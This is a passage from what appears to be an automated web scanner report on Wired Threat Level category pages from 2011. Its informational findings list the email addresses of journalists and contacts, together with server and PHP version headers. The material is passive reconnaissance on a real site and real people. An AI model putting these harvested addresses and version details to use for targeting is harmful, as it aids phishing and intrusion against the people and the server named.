...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.51. http://www.wired.com/threatlevel/category/cyberbullying/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cyberbullying/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:33:22 GMT
Date: Wed, 12 Jan 2011 15:29:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.52. http://www.wired.com/threatlevel/category/cybersecurity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cybersecurity/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=170
Expires: Wed, 12 Jan 2011 15:32:31 GMT
Date: Wed, 12 Jan 2011 15:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.53. http://www.wired.com/threatlevel/category/defcon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/defcon/

Issue detail

The following email addresses were disclosed in the response:

dave@eecue.com
david_kravets@wired.com
eecue@eecue.com
john.borland@gmail.com
jya@pipeline.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
someone@wikileaks.org
threatlevel1@wired.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=167
Expires: Wed, 12 Jan 2011 15:32:33 GMT
Date: Wed, 12 Jan 2011 15:29:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young’s accounts.</p>
...[SNIP]...
<a href="mailto:dave@eecue.com">
...[SNIP]...
<a href="mailto:threatlevel1@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.54. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/digital-millennium-copyright-act/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=283
Expires: Wed, 12 Jan 2011 15:34:30 GMT
Date: Wed, 12 Jan 2011 15:29:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.55. http://www.wired.com/threatlevel/category/e-voting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/e-voting/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=215
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:29:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.56. http://www.wired.com/threatlevel/category/elections/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/elections/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
evan@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=263
Expires: Wed, 12 Jan 2011 15:34:13 GMT
Date: Wed, 12 Jan 2011 15:29:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:evan@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.57. http://www.wired.com/threatlevel/category/fed-blotter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/fed-blotter/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
evan@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=189
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:29:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:evan@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.58. http://www.wired.com/threatlevel/category/glitches-and-bugs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/glitches-and-bugs/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=158
Expires: Wed, 12 Jan 2011 15:32:37 GMT
Date: Wed, 12 Jan 2011 15:29:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.59. http://www.wired.com/threatlevel/category/hacks-and-cracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/hacks-and-cracks/

Issue detail

The following email addresses were disclosed in the response:

brian_x_chen@wired.com
david_kravets@wired.com
john.borland@gmail.com
jya@pipeline.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
someone@wikileaks.org
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:29 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=167
Expires: Wed, 12 Jan 2011 15:32:48 GMT
Date: Wed, 12 Jan 2011 15:30:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:brian_x_chen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young’s accounts.</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.60. http://www.wired.com/threatlevel/category/hans-reiser-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/hans-reiser-trial/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=250
Expires: Wed, 12 Jan 2011 15:34:18 GMT
Date: Wed, 12 Jan 2011 15:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.61. http://www.wired.com/threatlevel/category/identification/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/identification/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=188
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.62. http://www.wired.com/threatlevel/category/intellectual-property/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/intellectual-property/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:03 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=213
Expires: Wed, 12 Jan 2011 15:33:52 GMT
Date: Wed, 12 Jan 2011 15:30:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.63. http://www.wired.com/threatlevel/category/lori-drew-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/lori-drew-trial/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=98
Expires: Wed, 12 Jan 2011 15:32:12 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.64. http://www.wired.com/threatlevel/category/network-neutrality/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/network-neutrality/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=147
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:30:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.65. http://www.wired.com/threatlevel/category/nsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/nsa/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=150
